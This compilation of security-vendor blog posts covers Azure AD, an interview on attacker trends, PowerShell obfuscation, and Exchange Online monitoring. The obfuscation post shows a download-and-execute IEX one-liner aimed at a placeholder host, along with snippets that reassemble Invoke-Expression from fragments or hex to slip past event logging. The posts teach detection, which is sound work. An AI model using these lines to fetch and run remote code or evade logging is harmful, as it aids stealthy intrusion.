First released with Windows 2000 Server edition, Active Directory is essentially a database that helps organize your company's users, computers, and more. It provides authentication and authorization to applications, file services, printers, and other on-premises resources. It uses protocols such as Kerberos and NTLM for authentication, and LDAP to query and modify items in the AD databases.
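
For instance, the directory is queryable with a couple of lines of PowerShell via the ActiveDirectory module (part of RSAT); a quick sketch:

    # List enabled users and their last logon -- LDAP does the work under the hood
    Import-Module ActiveDirectory
    Get-ADUser -Filter 'Enabled -eq $true' -Properties LastLogonDate |
        Select-Object SamAccountName, LastLogonDate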

There’s also that wonderful Group Policy feature to streamline user and computer settings throughout a network.

With so many security groups, user and admin accounts, and passwords stored in Active Directory – and identity and access rights managed there as well – securing AD is key to safeguarding an organization's assets.

Now with emails, files, CRM systems and even applications stored in the cloud, can we be as confident they’re as safe as when they were in the company’s own servers?

A Whole New World: AD Service in the Cloud?

As new startups and organizations build their companies, they most likely won’t have any on-premise data and the huge shocker is that they also won’t be creating forests and domains in AD. I’ll get more into this later.

But organizations with existing infrastructure have already made a significant investment in on-premise infrastructure and will have to visualize a new way of operationalizing their business.

Why? Azure AD will likely be a key part of Microsoft’s future. So if you’re already using any of Microsoft’s online services such as Office 365, Sharepoint Online and Exchange online, you’ll have to figure out how to navigate your way around it. And it already looks like organizations are rapidly adopting cloud-based apps and are running them nearly 50% of the time.

What’s Different in Azure Active Directory?

First, you should know that Windows Server Active Directory wasn’t designed to manage web-based services.

Azure Active Directory, on the other hand, was designed to support web-based services that use REST (REpresentational State Transfer) API interfaces for Office 365, Salesforce.com, etc. Unlike plain Active Directory, it uses completely different protocols that work with these services (goodbye, Kerberos and NTLM) – protocols such as SAML and OAuth 2.0.

As I pointed out earlier, with Azure AD you won't be creating forests and domains. Instead, you'll be a tenant, which represents an entire organization. In fact, once you sign up for Office 365, SharePoint Online, or Exchange Online, you'll automatically be an Azure AD tenant, where you can manage all the users in the company as well as the passwords, permissions, user data, etc.
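
As a quick sketch of what tenant-level management looks like, the AzureAD PowerShell module lets you enumerate users much as you would on-prem (cmdlet behavior varies with module version):

    # Connect to your Azure AD tenant and list enabled users
    Connect-AzureAD
    Get-AzureADUser -Filter "accountEnabled eq true" |
        Select-Object DisplayName, UserPrincipalName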

Besides seamlessly connecting to any Microsoft Online Services, Azure AD can connect to hundreds of SaaS applications using single sign-on. This lets employees access the organization's data without repeatedly being asked to log in. The access token is stored locally on the employee's device. Plus, you can limit access by setting token expiration dates.

For a list on free, basic and premium features, check out this comparison chart.

Introducing Azure AD Connect

For organizations ready to migrate their on-premises structure to Azure AD, try Azure AD Connect. For a great tutorial on integration, read this how-to article.

And in an upcoming post, I’ll curate a list of top Azure AD tutorials to help you transition into a brand new interface and terminology.

With the move to Azure, we bid farewell to Kerberos, forests, and domains. And flights of Microsoft angels sing thee to thy rest!

[Transcript] Ofer Shezaf and Keeping Ahead of the Hackers

This article is part of the series "[Podcast] Varonis Director of Cyber Security Ofer Shezaf".

Inside Out Security: Today I'm with Ofer Shezaf, who is Varonis's Cyber Security Director. What does that title mean? Essentially, Ofer's here to make sure that our products help customers get the best security possible for their systems. Ofer has had a long career in data security and, I might add, is a graduate of Israel's amazing Technion University.

Welcome, Ofer.

Ofer Shezaf: Thank you.

IOS: So I’d like to start off by asking you how have attackers and their techniques changed since you started in cyber security?

OS: Well, it does give away the fact that I've been here for a while. And the question is also an age-old question: some people will say that it's an ever-evolving threat, and some would say it's just the same thing time and time again.

My own opinion is that it’s a mixed bag. Techies would usually say that it’s all the same as usual. Actually, the technical attack vectors tend to be rather the same. So buffer overflows have been with us for probably 40 years, and SQL Injection for the last 20.

Nevertheless, everything around the technical attack vectors does change. And I think that the sophistication and the resources that the dark side is investing — it always amazes me how much it’s always increasing!

When Stuxnet appeared a few years back, targeted, you know, nuclear reactors in Iran, I thought it was just, you know, a game changer. Things will never be the same!

But today it seems to be that every political campaign tends to utilize the same techniques, so it’s amazing how much the bad guys are investing into those hacks. And that changes things.

IOS: Do you have any thoughts on the dark web, and now this new trend of actually buying productized malware? Do you think that is changing things?

OS: It certainly does change things. To generalize a bit, I think that the economy behind hacking has evolved a lot. It’s way more of a business and the dark web today is not a dark alley anymore. It’s more like a business arena.

And if you think about it, ransomware, which is a business model to make money from malware, is using the same technical techniques as malware always did. But today's dark web and the economic infrastructure of Bitcoin enable it to be a real business, which is where it becomes riskier and more frightening to an extent.

IOS: At Varonis, we have obviously been focusing on … that attackers have had no problem, or fewer problems than in the past, getting inside. And that's basically through phishing and some other techniques.

So do you think that IT departments have adapted to this new kind of threat environment where the attacker is better able to sort of get in, you know, in through the perimeter, or they have not adapted to these kinds of threats?

OS: So I must say I meet a lot of people working in IT security. And there are some smart guys out there. So they know what it's about — we are not blind as an industry to the new risks. That said, the hackers are successful, which implies that we are missing something! Based on results, we lose.

Why there's this misalignment of capabilities and results is the million-dollar question. My answer is a personal one: we don't invest enough … I mean, it's a nine-to-five sort of job to be in IT security, and it needs to be a lot more like policing, like physical security. We need to be into it. I coined a term for that: we need … to do continuous security, as you'd expect the army or military or police to do.

IOS: We spoke a little bit before this, and you had talked about, I guess, Security Operation Centers or SOCs. So is that something you think should be more a part of the security environment?

OS: Yeah. I mentioned continuous security, but it's just a term, and it might be worth thinking about what it actually implies for an organization. So SOCs, Security Operation Centers, have been around for a while. But they tend to, well, not take it all the way.

I think that we need to have people sitting there really 24-7 even in smaller organizations because it’s becoming, you know… You have a guard at the door even in smaller organizations. So you need someone in the SOC all the time.

And they don’t need just to react. They need to be proactive.

So they need to hunt, to look for the bad guys, to do rounds around the building if you think about it in physical terms. And if we do that, if people invest more time, more thinking … they'll also feed back into the technical means, which are our primary security tools today.

IOS: Ofer, we often see a disconnect between the executive suite and people doing data security on the ground. Maybe that’s just appearing with all the breaches in the last few years. I’m not sure. If there are one or two things you could tell the C-level about corporate data security, what would they be?

OS: So I did mention one, which is how much we invest. I think there’s under-investment and investment, at the end of the day, is in the hands of the executives.

The other thing is rather contradictory, maybe, but it's important, and that's the fact that there is no total security … The only system which is entirely secure is a system which has no users and doesn't operate. So it's all about risk management. If it's about risk management, it implies that we have to make choices, and it also implies that we will be hacked.

And if we will be hacked, we need to make sure it's the less important systems, and we also have to make sure that we have the right plans for the day after. What will we do when we are hacked?

So things like separating systems that are important, defining which are the business-critical systems – those where your stock would drop if they were hacked – and those that are peripheral, important but less so.

IOS: So we've often talked about Privacy by Design on the IOS blog, but the term, as you told me, is actually older. I mean, that phrase really comes out of Security by Design, which is more of a programming term. And that really means that developers should consider security as they're developing, as they're actually making the app.

I was wondering if this approach of Security by Design where we’re actually doing the security from the start will really lessen the likelihood of breaches in the coming years. Or will we need more incentives to get these applications to be more secure?

OS: So we are moving from operational security, which is protecting systems after they are put in place, into designing their security upfront, before we start deploying them. So it's … the other part. I spent many years in application security, which is right around that.

And I think that the concept of baking security into the development process makes sense to everyone. It saves money later on, because you don't have to fix things when they're found, and it also has the benefit of making systems more secure.

That said, it's not a new concept. I mentioned that Security by Design is a term that's been used for a decade and a half. It doesn't happen enough, and the question is why? Why is Security by Design not happening as much as we would like it to, and how do we make it better?

And I think that the key to that is that developers are not measured by security! They are measured by how much they output in terms of functionality. Quality is important, but it's measured in terms of failures rather than security breaches. And security is someone else's problem, so it's not the developer's problem or the development manager's problem.

As long as we don't change that, as long as they don't think of security as an important goal of the development process, it will be a leftover, something done as an afterthought.

IOS: Well, it sounds like we may need other incentives here. And so for example, I can go to a store and buy a light bulb, and I know it has been certified by some outside agency. In the United States, it’s Underwriters Lab. There are a few others that do that.

Do you think we may see something like that, an outside certification saying that this software meets some minimal security requirements?

OS: So it goes back to compliance versus real security … I think compliance and regulations are important for correcting market deficiencies. When things do not work because the right incentives aren't there, it's an important starting point.

That said, they are there, they’re just not providing enough. They’re also not, today, targeted specifically at the development phase, and in most cases, they are taken to be part of the operational phase, which is later on.

So it will be an interesting idea to try to create a development process for specific regulations. It’s harder because we make end-result regulations … we don’t make good software requirements!

That said, I once saw an interesting demonstration. Somebody created a label for software, like the label you have on food, with the ingredients saying, you know, how many SQL injections it might have and how much cross-site scripting it might have, as you would have for sugars and fats …

IOS: It is quite an interesting idea! At the blog, we’ve written a lot about pen testing, and actually, we’ve also spoken to a few actual testers. You know, obviously, this is another way to deal with … improving security in an organization. I’m wondering, how do you feel about hiring these outside pen testers?

OS: So first of all, by definition, it's the opposite of Security by Design. It usually comes in later in the game, once the system is ready. So if I said I believe in Security by Design, then pen testing seems to be less important. That said, because Security by Design doesn't work well, pen testing is needed. It's very much an educational phase where you bring people in, and they tell you what you didn't do right.

Why don't I see this as more than educational? First, because pen testers are usually given only as much time as was allocated. You know, it's money at the end of the day, and today the bad guys are just investing more.

It's not a holistic way to make the software secure, it's an … opportunistic one, and usually it gets some things, but it doesn't get all the things … It's good for education — it shows there is an issue — but it's not good enough to make sure that we are really secure.

IOS: That’s right.

OS: That said, it is important … There are two things which are important when you do pen testing. The first one is, since pen testers find just some of the issues, make sure those findings are used to create a thought process around the larger challenges of the software!

So if they found cross-site scripting in a specific place, don’t just fix that one instance; fix all of the cross-site scripting flaws … or think about why your system was not built to overcome cross-site scripting in the first place. Take it [as a] driver for Security by Design.

As an anecdote, I once met an organization where a pen tester came in and found cross-site scripting. He demonstrated it by having the app pop up a “gotcha” dialog. Two weeks later, the developers came back and said they fixed it: it doesn’t happen anymore. What they had actually done was check for the word “gotcha” in their input and block it. That does happen, unfortunately!

And beyond fixing the single instance … if you have pen testing and they find cross-site scripting, fine, but think about why your system was not built to handle those across the board in the first place.

The second thing that’s very important: pen testing is usually done very late in the development lifecycle, and too many times there’s just not enough time to fix things. So doing it earlier, making it part of the, you know, tests as modules are released rather than a last-moment exercise, will ensure that more can be fixed before launch … those systems will be less vulnerable.

 

IOS: We also know that Microsoft has started addressing some long-standing security gaps … starting with Windows 10. There’s also Windows 10 S, which is Microsoft’s special security configuration for 10. I was wondering if you can tell us what 10 S is doing that may help organizations with their security.

OS: So Windows 10 S is the whitelisting version. If you think about security, there are two options to secure things, and nearly every security system selects one. One of them is to allow everything in general and then try to block what’s dangerous, okay? An anti-virus would be a good example: install whatever you want to install, and the anti-virus will catch it if it’s a virus.

The second option, whitelisting, is always more secure, but it always limits functionality more. Windows 10 S takes this approach: it limits software installation to only things that actually come from the Microsoft App Store.

So it’s way more limited, functionality-wise; it sort of feels like it is less of a full system. And personally, you know, [as] an IT guy who’s been around for quite a while, it feels too limited for me. But looking at how, you know, my kids are using computers, how general office workers are using computers, it might be just enough.

So it might be a good choice by Microsoft to create those limited versions that are secure by design, because they allow only as much as is needed rather than blocking what’s wrong.

IOS: Right. If I understand what you’re saying, it would prevent, let’s say, malware from being loaded, because the malware wouldn’t have been signed, so it wouldn’t have been on the actual whitelist of …

OS: It’s not just signed, it’s actually downloaded from the Microsoft App Store, so it’s way more restrictive … Signing already exists in Windows today; this is the next step.

IOS: So then it would really prevent anything from being…any outside software from being loaded. Okay. And … is there a performance penalty for that?

OS: As far as I know there is no performance penalty. In a way, having more security in this case might actually improve performance and stability, because unpredicted software is also a challenge for performance and stability. The downside is functionality.

 

IOS: Right. We know from security analysts that hackers and cybercriminals have targeted executives (they call it, you know, spear phishing or whale phishing), since executives have more valuable information compared to the average employee.

So it would sort of make sense to actually target these people. I was wondering if you think that executives should receive extra security protections, or whether they should take extra precautions in their day-to-day work on the computer?

OS: So in a way, you said it all, because we do know that executives are targeted more, so we need to focus on securing them. We do it in the real world … drawing parallels with the physical security world, so it does make sense. … But a lot of our security controls are automated, and when it’s automated, if you invest in detecting that somebody is posing as a user, why stop at executives?

So my take on that would be: make the automated detection systems address any user, but then focus. An alert still gets to an incident response team that has to assess whether the risk is there and what to do. They can prioritize based on the type of user, executives being one type of sensitive user, by the way. Of course, admins are another type.

IOS: Yeah, I mean, I could almost imagine a SOC having a special section just focused on executives, perhaps looking at any kind of notifications or alerts that come up from the standard configuration, but actually digging a little deeper when those things come up for the executives.

OS: Yes. If you think about it, the major challenge of a SOC is handling the flow of alerts, and any means that enables them to be more efficient in handling alerts, focusing on those that are more critical to the business, where the risk is higher, is important. Executives are a very good example.

So just pop the alerts about the executives to the top of the list, and the analyst gets to them first and does something reasonable … that’s more valuable to the organization.

After all, there is no 100% security! Some incidents or alerts will always be left over.

 

IOS: One last question. Any predictions on hacking trends in the next few years? I mean, are there new techniques on the horizon that we should be paying closer attention to?

OS: Oh, it’s a crystal ball question. It’s always hard, and I’m probably wrong, but I’ll try.

So the way to look into that, the way to try to predict, is this: I’ve found that hacking techniques usually trail changes in IT technology. Hackers become experts in a new technology only a year or two, or even more than that, after the technology becomes widespread. In this respect, I think that mobile is the next front.

We all use mobile, but business use of mobile, the Salesforce mobile app for instance, is rather new. In the last couple of years, we can actually do more work on the mobile device, which means it’s a good target for malware. And I think we’ve seen malware for mobile, but we still haven’t seen financial or enterprise malware, ransomware for mobile for example, and that will be coming.

IOS: And what about the Internet of Things, which is somewhat related to mobile, as a new trend? Are we starting to see some of that?

OS: Yes, it’s an area where we’ve seen two things. First of all, a lot of research, which always comes before actual real-world use. If you look at what researchers are doing today, you know what hackers will do in two or three years!

And as of today, we’ve seen mostly denial-of-service attacks against, you know, Internet of Things devices, where they were … taken off the network.

It would be interesting — it would be frightening, actually — once the bad guys start to do more innovative damage by taking over devices. You know, cars are a very frightening example, of course, as are traffic lights, electricity controllers, etc.

That said, the business model is the driving factor. And unlike, for example, malware for mobile or malware on cloud systems, I still don’t see the business model around the Internet of Things, apart from nation states.

IOS: It’s interesting! So, Ofer, thank you for joining us. This was a really fascinating discussion, and it’s good to get this perspective from someone who’s been in the business for such a long time.

OS: Thank you. My pleasure as well.

PowerShell Obfuscation: Stealth Through Confusion, Part II


This article is part of the series “PowerShell Obfuscation”.

Let’s step back a little from the last post’s exercise in jumbling PowerShell commands. Obfuscating code as a technique to avoid detection by malware and virus scanners (or prevent reverse engineering) is nothing really new. If we go back into the historical records, there’s this (written in Perl).  What’s the big deal, then?

The key change is that hackers can go malware-free by using garden variety PowerShell in practically all phases of an attack. And through obfuscation, this PowerShell-ware then effectively has an invisibility cloak.  And we all know that cloaking devices can give one side a major advantage!

IT security groups have to deal with this new threat.

Windows PowerShell Logging Is Pretty Good!

As it turns out, I was a little too quick in my review last time of PowerShell’s logging capabilities, which are enabled in Group Policy Management. I showed an example where I downloaded and executed a PowerShell cmdlet from a remote website:
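The original screenshot isn’t reproduced here, but a download-and-execute one-liner generally looks something like this (a hypothetical re-creation with a placeholder URL, not the exact command from the post):

    # Fetch a string of PowerShell from a remote site and run it in memory,
    # without ever touching disk. IEX is the built-in alias for Invoke-Expression.
    IEX (New-Object System.Net.WebClient).DownloadString('http://remote-site.example/payload.ps1')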

I was under the impression that PowerShell logging would not show the evil malware embedded in the string that’s downloaded from the web site.

I was mistaken.

If you turn on the PowerShell module logging through GPM, then indeed the remote PowerShell code appears in the log. To refresh memories, I was using PowerShell version 4 and (I believe) the latest Windows Management Framework (WMF), which is supposed to support the more granular logging.

Better PowerShell logging can be enabled in GPM!

It’s a minor point, but it just means that the attackers would obfuscate the initial payload as well.

I was also mistaken in thinking that the obfuscations provided by Invoke-Obfuscation would not appear de-obfuscated in the log. For example, in the last post I tried one of the string obfuscations to produce this:

Essentially, it’s just a concatenation of separate strings that’s assembled at run-time to form a cmdlet.
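The flavor of the trick, in a simplified illustration of my own (not Invoke-Obfuscation’s exact output), is roughly:

    # The cmdlet name is split into innocuous fragments and only
    # reassembled at run-time, which defeats naive string matching.
    $cmd = 'Inv' + 'oke-Ex' + 'pression'
    & $cmd 'Write-Output hello'   # invokes Invoke-Expression on the string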

For this post, I sampled more of Invoke-Obfuscation’s scrambling options to see how the commandline appears in the Event log.

I tried its string re-order option (below), which takes advantage of some neat tricks in PowerShell.

Notice that first part, $env:comspec[4,15,25]? It takes the environment variable $env:comspec and pulls out the 4th, 15th, and 25th characters to generate “IEX”, the PowerShell alias for Invoke-Expression. The -join operator takes the array and converts it to a string.

The next part of this PowerShell expression uses the format operator f. If you’ve worked with sprintf-like commands as a programmer, you’ll immediately recognize these capabilities. However, with PowerShell, you can specify the element position in the parameter list that gets pulled in to create the resulting string. So {20}, {5}, {9}, {2} starts assembling yet another Invoke-Expression cmdlet.
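Both tricks are easy to reproduce at the console. A minimal sketch (the indexes and format positions below are my own, not the exact ones from the screenshot):

    # $env:ComSpec is usually 'C:\WINDOWS\system32\cmd.exe', so characters
    # 4, 15 and 25 spell out 'Iex', the case-insensitive Invoke-Expression alias.
    $alias = -join $env:ComSpec[4,15,25]           # 'Iex'

    # The format operator pulls parameters in by position, so fragments can be
    # listed out of order and still assemble into a cmdlet name.
    $cmdlet = '{1}{0}' -f 'ession', 'Invoke-Expr'  # 'Invoke-Expression'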

Yes, this gets complicated very quickly!

I also let Invoke-Obfuscation select a la carte from its obfuscation menu, and it came up with the following mess:

After trying all these, I checked the Event Viewer to see that with the more powerful logging capabilities now enabled, Windows could see through the fog, and capture the underlying PowerShell:

Heavily obfuscated, but with PowerShell Module logging enabled the underlying cmdlets are available in the log.

Does this mean that PowerShell obfuscation always gets de-obfuscated in the Windows Event log, thereby allowing malware detectors to use traditional pattern matching?

The answer is no!

Invoke-Obfuscation also lets you encode PowerShell scripts into raw ASCII, Hex, and, yes, even Binary. And this encoding obfuscation seems to foil the event logging:

The underlying cmdlet represented by this Hex obfuscation was not detected.
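To see why encoding is so effective, consider this simplified sketch of the idea (my own illustration, not Invoke-Obfuscation’s exact output): the payload only turns back into recognizable PowerShell at the moment of execution.

    # Each element is the hex code of one character: 'I', 'E', 'X'.
    $hex = '49','45','58'
    $decoded = -join ($hex | ForEach-Object { [char][Convert]::ToInt32($_, 16) })
    & $decoded '2+2'   # runs Invoke-Expression; the log sees mostly hex noise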

Quantifying Confusion

It appears at this point the attackers have the advantage: a cloaking device that lets their scripts appear invisible to defenders or at least makes them very fuzzy.

The talk given at Black Hat that I referenced in the first post also introduced work done by Microsoft’s Lee Holmes – yeah, that guy – along with Daniel Bohannon and other researchers on detecting obfuscated malware using probabilistic models and machine learning techniques.

If you’re interested you can look at the paper they presented at the conference. Holmes and his team borrowed techniques from natural language processing to analyze character frequency of obfuscated PowerShell scripts versus the benign varieties. There are differences!

Those dribbles below the main trend show that obfuscated PowerShell has a different character frequency than standard scripts.
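You can get a rough feel for this kind of analysis yourself. Here’s a minimal character-frequency tally (my own sketch, not the researchers’ code; the script path is a placeholder):

    # Count how often each character appears in a script. Obfuscated PowerShell
    # tends to over-use quotes, braces, plus signs and back-ticks compared
    # with ordinary, benign scripts.
    $text = Get-Content -Raw '.\sample.ps1'
    $text.ToCharArray() |
        Group-Object |
        Sort-Object Count -Descending |
        Select-Object Name, Count -First 10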

In any case, Holmes and his group moved to a more complicated logistic regression model – basically classifying PowerShell code as either evil obfuscated scripts or normal ones. He then trained his logit by looking deep into PowerShell’s parsing of commands – gathering stats on levels of nesting, etc. – to come up with a respectable classifier with an accuracy of about 96%. Not by any means perfect, but a good start!

A Few More Thoughts

While I give a hat tip to Microsoft for improving their PowerShell logging game, there are still enough holes for attackers to get their scripts run without being detected. And this assumes that IT groups know to enable PowerShell Module logging in the first place!

The machine learning model suggests that it’s possible to detect these stealthy scripts in the wild.

However, this means we’re back into the business of scanning for malware, and we know that this approach ultimately falls short. You can’t keep up with the attackers who are always changing and adjusting their code to fool the detectors.

Where is this leading? Of course, you turn on PowerShell logging as needed and try to keep your scanning software up to date, but in the end you need to have a solid secondary defense, one based on looking for post-exploitation activities involving file accesses of your sensitive data.

Catch what PowerShell log scanners miss! Request a demo today.

3 Tips to Monitor and Secure Exchange Online


Even if you don’t have your sights on the highest office in the country, keeping a tight leash on your emails is now more important than ever.

Email is commonly targeted by hackers as a method of entry into organizations. Whether your email is hosted by a third party or managed internally, it is imperative to monitor and secure those systems.

Microsoft Exchange Online – part of Microsoft’s Office 365 cloud offering – is just like Exchange on-prem, but you don’t have to deal with the servers. Microsoft provides some tools and reports to help secure and monitor Exchange Online, like encryption and archiving, but they don’t cover all the things that keep you up at night, like:

  • What happens when a hacker gains owner access to an account?
  • What happens if a hacker elevates permissions and makes themselves owner of the CEO’s email?
  • What happens when hackers have the access to make changes to the O365 environment? Will you notice?

These questions are exactly what prompted us to develop our layered security approach – Andy does a great job explaining its major principles here. What happens when the bad people get in and have the ability to change and move around the system? At the end of the day, Exchange Online is just another system that provides an attack vector for hackers.

Applying these same principles to Exchange Online, we can extrapolate the following to implement monitoring and security for your email in the cloud:

  1. Lock down access: Make sure only the correct people are owners of mailboxes, and limit the ability to make changes to permissions or O365 to a small group of administrators (see the sketch after this list).
  2. Manage user access: Archive and delete inactive users immediately. Inactive users are an easy target for hackers as they are usually able to use those accounts without being noticed.
  3. Monitor behavior: Implement a User Behavior Analytics (UBA) system on top of your email monitoring. Being able to spot abnormal behavior early (e.g., an account being promoted to owner of the CEO’s email folder, or an account forwarding thousands of emails to the same external address) is the key to stopping a hacker in hours or days instead of weeks or months.
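For the access review in tip 1, a starting point might look like this (a minimal sketch, assuming the ExchangeOnlineManagement PowerShell module and an account with the appropriate admin roles; the sign-in name is a placeholder):

    # Connect to Exchange Online.
    Connect-ExchangeOnline -UserPrincipalName admin@yourtenant.example

    # List non-inherited Full Access grants on mailboxes, i.e. accounts that
    # can read someone else's email. Review anything unexpected.
    Get-Mailbox -ResultSize Unlimited |
        Get-MailboxPermission |
        Where-Object { $_.AccessRights -contains 'FullAccess' -and -not $_.IsInherited } |
        Select-Object Identity, User, AccessRights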

Wondering if there’s a good solution to help monitor your Exchange Online? Well, we’ve got you covered there too.